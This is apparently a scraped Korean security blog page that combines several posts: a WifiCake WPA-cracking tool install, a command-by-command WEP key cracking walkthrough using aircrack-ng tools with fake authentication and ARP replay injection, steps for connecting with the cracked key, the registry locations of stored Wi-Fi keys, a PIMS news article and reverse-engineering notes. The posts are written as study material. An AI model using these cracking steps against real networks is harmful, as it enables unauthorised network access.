WifiCake backtrack 버전을 설치해 보자

아주 간단하다.

#>mkdir /appdev
#>cd /appdev/
#>wget
http://weaknetlabs.com/code/wificake/wificake-ng_v1.7.tar.gz
#>tar vxzf wificake-ng_v1.7.tar.gz

BackTrack은 KDE를 사용하므로 KDE환경에 맞추기 위해 설정파일을 변경해야 한다.
#>sed -i errors.pl -e 's/evince/kpdf/g' errors.pl

관련 라이브러리들을 설치해준다.
#>apt-get update
#>apt-get install libpdf-api2-perl
#>cpan -i Tk::PathEntry

실행시킨다.
#>perl wificake

Weakerthan에 설치되어 있는 WPA 크랙 GUI 툴이다.
기존에 커맨드로 했던 기능들을 GUI로 만든것 같다. 내부적으로 airodump-ng, aireplay-ng 등을 사용한다.
특이한건 mysql과 연동되어 무선AP들에 대한 정보를 DB에 저장할 수 있다.
현재 WPA는 크랙이 되지 않는다. 그래서 WPA용 rainbow table이 필요하다.(참고로 이거 용량이 32기가 정도 된다.-_-;)

[1] wificake 실행화면이다. GUI툴로 깔끔하다.

[2]"CONFIG"탭으로 가서 "autoStart"버튼을 누르면 현재 무선랜카드를 매칭시킨다.

[3] "STATS"탭을 확인하면 AP정보들이 나온다.(일단 정상적으로 작동을 한다.)

[4] "CMNG"탭은 필터링 기능이다.

[5] 'WDSQL"탭은 mysql과 연동되어 AP정보들을 DB에 저장한다.
사전에 mysql에 wdsql db를 생성해야 된다. 그 후 "create tables in DB"를 누르면 test 테이블이 생성된다.

[6] "insert Data to DB"를 누르면 AP정보들이 DB에 저장된다. "View Table in DB"를 통해 내용을 확인할 수 있다.

[7] "Windshield" 버튼은 실시간으로 변하는 AP정보들이 자동으로 저장된다.

[8] "INJECT"탭은 패킷 인젝션 공격을 하는 부분이다.


[9] "PYRIT"탭에서는 수집한 패킷을 크랙하는 부분이다.
"Hash File"은 레인보우 테이블이나 해쉬파일을 선택하고 "PCAP file"은 수집한 패킷을 지정해 두면 된다.

현재 WPA용 레이보우 테이블을 다운 받지 못해 테스트를 해보진 못했지만,
기존에 커맨드로 길게 썼던 명령들, 특히 맥어드레슬 입력해야되 더 길어진 명령어를 알아서 해주니 기특(?)한 툴이다.^^

[보안뉴스 김정완] 방송통신위원회가 지난 1년여 동안 개인정보 유출사고를 방지하고 기업의 사회적 책임을 강화하기 위해 1년여 전부터 ‘개인정보보호관리체계(PIMS, Personal Information Management System) 인증제’를 준비해 옮에 따라 기업은 ISMS 등의 인증과 맞물린 이중규제 아니냐는 목소리가 있었던 가운데 PIMS 인증제도의 도입을 위한 공청회가 마련돼 주목된다.

 

▲방송통신위원회와 한국인터넷진흥원(KISA)은 19일, 1년여 전부터 준비해 온 ‘개인정보보호관리체계 인증제’와 관련해 9월 도입 방안 마련에 앞서 각계의 의견을 수렴하는 공청회를 가졌다. @보안뉴스.

 

방통위는 ‘PIMS 인증제 공청회’를 향후 PIMS 인증수행기관이 될 한국인터넷진흥원(KISA)과 함께 19일, 목동 방송회관 컨벤션 센터에서 개최한 것.


‘PIMS 인증제’란 기업이 개인정보보호 활동을 체계적·지속적으로 수행하기 위해 필요한 일련의 보호조치 체계를 구축했는지를 점검해 일정 수준 이상의 기업에 인증을 부여하는 것이다.


기업에게는 체계적인 개인정보보호 활동을 위한 방법을 제시하고 국민들에게는 개인정보를 안전하게 관리하는 기업을 식별할 수 있는 기준을 제시해 준다. 방통위에서는 작년부터 각계 전문가와 함께 인증체계 및 심사기준 등을 연구하고 개인정보 취급 기업 등을 대상으로 모의 인증을 실시하며 제도화를 준비해 왔다.


이날 공청회 패널토론에 앞서서는 우선 방통위에서 PIMS 인증제도를 소개를 시작으로 허경석 인포섹 수석이 지난해 하반기부터 올해 상반기까지 PIMS 모의인증 결과를 발표했다.


인포섹이 모의인증을 수행한 사업규모와 유형에 따른 4개 기업은 SK텔레콤과 NHN, 인크루트, 인터넷교차로이다. 허경석 수석은 이들 4개 기업에 대한 모의인증 범위, 방식, 절차 등의 개요를 설명하고 그 결과를 요약하면서 향후 PIMS의 개선요소를 점검했다.


특히 이들 기업에 대한 모의인증 결과, 대기업은 통제항목 이행률에 있어서 90% 이상의 이행률을 보여 적용에 문제가 없으며 중기업은 이행률이 50%에 그쳤지만 향후 적용 가능성은 95% 이상으로 준비과정을 거쳐 적용이 가능하다는 결과를 도출해 냈다. 하지만 아쉽게도 통제항목 이행률에서도 25%에 그친 소기업의 경우는 향후 적용 가능성도 35% 정도에 그쳐 적용에 무리가 있을 것으로 결과가 나왔다.


이어서는 개인정보보호를 잘 하는 기업으로 알려진 SK텔레콤의 신구열 매니저가 나서 현재까지의 SKT 고객정보보호 추진활동을 발표했으며, 강태훈 한국정보통신산업협회(KAIT) 연구원은 국내·외 개인정보보호 마크 및 인증제도에 대해 설명·발표했다.


마지막으로 이날 염흥열 순천향대 교수의 사회로 진행된 패널 토론에서는 오상진 방통위 과장, 이강신 KISA 단장, 김정덕 중앙대 교수, 송기정 딜로이트 상무, 이준호 NHN 이사, 유창하 다음커뮤니케이션 본부장, 윤주희 소비자시민의모임 부위원장이 패널로 나서 정부·학계·시민단체·업계를 대표해 PIMS 인증제에 대해 토론을 펼쳤다.


한편 방통위는 이번 공청회에서 논의된 사항을 반영해 9월중에 개인정보보호 관리체계 인증제 도입 방안을 마련할 방침이다. 기타 이날 패널 토론에서 나선 패널들의 의견 등은 개별 기사를 통해 확인할 수 있다.

출처 URL : http://www.boannews.com/media/view.asp?idx=22479&kind=2

WEP Key를 크랙했다면 이제 이 키를 이용하여 인터넷을 연결해야 할 것이다.

콘솔에서의 연결과 GUI툴로 연결하는 법을 알아 보자

[1] 콘솔 연결
#>iwconfig rausb0 key "xxxxxx"
--> iwconfig로 연결할 인터넷 카드를 선택하고 키값을 입력한다.
#>dhcpcd rausb0
--> dhcpcd로 ip를 할당 받는다.



[2] GUI툴 연결
backtrack에서 지원하는 wireless assistant를 실행 시킨다. 윈도우에서 제공하는 무선연결 프로그램과 비슷하다.


다음과 같이 간단하게 인터넷이 된다.






예전에 WEP Key를 크랙했을 때의 자료를 정리해 올려본다.
WEP Key가 깨진것은 쫌 오래된 일이다. 이젠 그리 놀랍지도 않지만, 요즘 무선랜을 공부하는 중에 자료가 있어 정리해 본다.

WEP Key 크랙에 필요한 툴들은 backtrack에 다 있다.
무선 랜카드를 구하는게 문제다.

무선랜카드: Linksys WUSB54G v4 (chipset:Ralink rt2570)

#>airodump-ng –w [save_file_name] rausb0 --channel 1

[airodump-ng 옵션]

-c(--channel): 무선 네트워크의 채널

--bssid: 공격하고자 하는 AP MAC 주소

-w: IVs들이 담길 파일 이름

rausb0: 인터페이스 이름

 

 


#>aireplay-ng -1 0 –e [ESSID] –a [AP_MAC_addresss(BSSID)] –h [MY_MAC_address] rausb0

위와 같이 페이크 인증을 해야 한다. 페이크 인증이 되지 않으면 packet injection이 되지 않아 IVs패킷을 모으는게 힘들어 진다.

[aireplay-ng 옵션]

-1: fake authentication

0: 초당 재연결 시간

-e: ESSID

-a: AP MAC 주소

-h: 자신의 랜카드 MAC 주소

Rausb0: 인터페이스 이름

-3: arpreplay 모드

-b: 공격할 AP MAC


#>aireplay-ng -3 –b [AP_MAC_address(BSSID)] –h [MY_MAC_address] rausb0

--> 패킷의 량을 증폭시킨다. 아래화면을 보면 갑자기 패킷량이 증가함을 알 수 있다.

 이 방법은 ARP Request를 네트워크에 재주입 시키는 것이다. 이러면 AP는 ARP Request 패킷을 받아 새로운 IV를 생성하여 반출시킨다. 이 방법이 없었던 과거에는 IVs패킷을 모으는데 상당한 시간이 걸렸다.

 

 #>aircrack-ng –s [save_file_name.cap]
--> 획득한 패킷을 크랙한다.

 WEP Key Cracking에서는 IVs값을 얼마나 많이 모으느냐가 중요하다.
보통 128bit WEP Key를 크랙하기 위해서는 40,000~85,000개의 IVs값이 필요하다.



Backtrack4에는 기본적으로 kismet이 설치되어 있다.
그러나....
디폴트로 설치되어 있는 프로그램은 이상하게 실행이 잘 되지 않는다. ㅠㅠ(나만 그런가?ㅡㅡa)
kismet_server가 실행되지 않아 이래 저래 연구해보다 결국 그냥 다시 설치해 버렸다.

kismet싸이트에서 Kismet-2010-07-R1 버전을 다운 받는다.

설치는 매우 간단하다.
#>tar zxvf Kismet-2010-07-R1
#>./configure --prefix=/usr/local/kismet2010
#>make
#>make install

이런 후 그냥 실행하면 실행이 안될 것이다.
kismet.conf를 수정해 주어야 한다.

#>vi kismet.conf
nosource=mon0
-->자신의 무선랜카드 이름으로 설정해 주어야 한다. 2009 이전 버전에서는 source였던 것으로 기억한다.

#kismet2010/bin/>./kismet

아무리 봐도 참 잘 만든 툴 같다.^^

일반적으로 암호설정이 되어 있는 AP에 접속을 하려면 키값을 입력한다.
하지만 한번 입력된 키값은 한번만 입력하면 그 후로는 키 재 입력 없이 바로 접속이 가능하다.
그렇다면 당연히 PC어딘가에 키값이 저장되어 있을 것이다.

다음은 무선네트워크 키 값이 저장되어 있는 레지스트리 위치와 이 값을 불러 오는 프로그램이다.

[Window XP]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\[Interface Guid]

[Vista]
\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\[Interface Guid]

위 화면은 xp 레지스트리에 저장되어 있는 키값들이다.(암호화 되어 있는 원래 키값을 알 수가 없다.)


다음은 WirelessKeyView라는 프로그램을 통해 레지스트리에 있는 키 값을 가져온 화면이다.

WEP 키는 hex 또는 ascii값으로 복호화 되어 나타난다.

쓸만한 툴인듯 하다.^^


WEP, WPA 크랙은 언제나 무선랙카드의 aircrack-ng 지원 여부이다.
보통 외국 계열 회사(linksys, netgear 등등) 제품을 많이 사용하는데
드디어 iptime에서도 rt73 계열 칩셋을 사용하는 랜카드 발견+_+

다음은 내가 알아본 iptime 제품별 칩셋 정보이다.

 G054U2 rt73계열
 G054U2BE rt73계열
 G054UA (2571)rt73계열
 N300P//N300CA  2860
 N100P  2760
 N200UA  2870
 N100U  2770
 N100UA/N100U2/N100UM,N150U,150UA  3070

Segment Memory

8086 1mb의 메모리 공간을 다음과 같은 4개의 세그먼트 공간으로 나누어 관리함

Code Segment

명령어 코드를 저장

Data Segment

데이터를 저장

Stack Segment

메모리에 할당된 스택 영역

Extra(Heap) Segment

여분의 데이터 영역

 

 

Segment Register

8086이 필요한 정보를 세그먼트 단위로 나누어 저장하고 있기 때문에 정보를 가져오기 위해선 각 세그먼트의 시작 주소를 알아야 함

따라서 4개의 세그먼트 레지스터를 이용해 각 세그먼트 영역의 시작 주소를 가리킴

CS

실행 할 명령어들이 들어있는 코드 세그먼트의 시작 주소를 가지고 있는 레지스터.

CS * 10H + OFFSET(IP)로 물리 메모리 주소 결정

DS

데이터 세그먼트의 시작 주소를 가지고 있다.

메모리 직접 주소 지정 혹은BP외의 레지스터와 함께 사용하여 메모리 간접 주소 지정에서 오프셋 값과 더해져 물리 주소를 산출한다.

SS

스택 세그먼트의 시작 주소를 가지고 있다.

SP SS * 10H의 합으로 물리 주소를 결정한다. BP를 사용하는 메모리 간접 주소 지정에서 오프셋과 합해 물리 주소를 생성한다.

ES

일반적으로 문자열 처리에 사용.

문자열 처리 명령어가 수행되면 목적지의 위치는 DI EX * 10H로 결정되고 출발지는 SI DX * 10H로 물리주소 결정한다.

 

OffSet Register

최대 64KB인 세그먼트 안에 저장되어 있는 정보를 엑세스하기 위해서는 세그먼트 레지스터만으로 불가능함
-->
  다른 16비트 크기를 포인트 할 수 있는 레지스터가 필요함(offset register)

하나의 세그먼트에 접근하기 위해 대상이 되는 세그먼트 레지스터가 가진 시작 주소에 오프셋을 더해 데이터에 액세스

메모리 동작

묵시적 레지스터

대체가능 레지스터

오프셋

명령어 인출

CS

-

IP

스택 처리

SS

-

SP

데이터 엑세스

DS

CS, ES, SS

주소저장방식에 따라 다름

20bit 물리적 주소 산출

16비트 세그먼트 레지스터 << 4 + 16비트 offset

(segment:offset 구조로 되어 있는 논리주소는 segment주소를 4비트 쉬프트하고, offset을 더해주어서 물리주소로 변환)

seg : 20H offset : 10H일 때 → 200H(20H << 4) + 10H = 210H

1000004bit 쉬프트 = 100000 0000 → 1000000000 → 200H

10H → 10000

1000000000 + 10000 → 1000010000 → 210H

 

 


'Security > Reverse Engineering' 카테고리의 다른 글

[Revsering] ASCII Code List  (0) 2010.10.17
[Reversing] IDA pro 단축키  (0) 2010.09.02
[Reversing] Ollydbg 단축키  (0) 2010.07.02
[Reversing]구조화된 예외 처리(SEH)  (0) 2010.05.10
[Reversing]Input and Output  (0) 2010.05.10

Ctrl+F2

프로그램 재실행

Alt+F2

프로그램 닫기

F3

새 프로그램 열기

F5

활성화 되어 있는 윈도우 최대화, 혹은 원복

Alt+F5

olly 디버거 윈도우를 항상 위로

F7

Step into (함수 진입)

Ctrl+F7

Animate into (entering functions)

F8

Step over (executing function calls at once)

Ctrl+F8

Animate over (executing function calls at once)

F9

실행

Shift+F9

Pass exception to standard handler and run

Ctrl+F9

Execute till return

Alt+F9

Execute till user code

Ctrl+F11

Trace into

F12

Pause

Ctrl+F12

Trace over

Alt+B

Open Breakpoints window

Alt+C

Open CPU window

Alt+E

Open Modules window

Alt+L

Open Log window

Alt+M

Open Memory window

Alt+O

Open Options dialog

Ctrl+T

Set condition to pause Run trace

Alt+X

Close OllyDbg

F2

Toggle breakpoint

Shift+F2

Set conditional breakpoint

F4

Run to selection

Alt+F7

Go to previous reference

Alt+F8

Go to next reference

Ctrl+A

Analyse code

Ctrl+B

Start binary search

Ctrl+C

Copy selection to clipboard

Ctrl+E

Edit selection in binary format

Ctrl+F

Search for a command

Ctrl+G

Follow expression

Ctrl+J

Show list of jumps to selected line

Ctrl+K

View call tree

Ctrl+L

Repeat last search

Ctrl+N

Open list of labels (names)

Ctrl+O

Scan object files

Ctrl+R

Find references to selected command

Ctrl+S

Search for a sequence of commands

Asterisk (*)

Origin

Enter

Follow jump or call

Plus (+)

Go to next location/next run trace item

Minus (-)

Go to previous location/previous run trace item

Space ( )

Assemble

Colon (:)

Add label

Semicolon (;)

Add comment

ctrl+, 아래 화살표키

디스어셈블 위치 지정


 

'Security > Reverse Engineering' 카테고리의 다른 글

[Reversing] IDA pro 단축키  (0) 2010.09.02
[Reversing] Segment, Offset  (0) 2010.07.02
[Reversing]구조화된 예외 처리(SEH)  (0) 2010.05.10
[Reversing]Input and Output  (0) 2010.05.10
[Reversing]실행 포멧  (0) 2010.05.08

+ Recent posts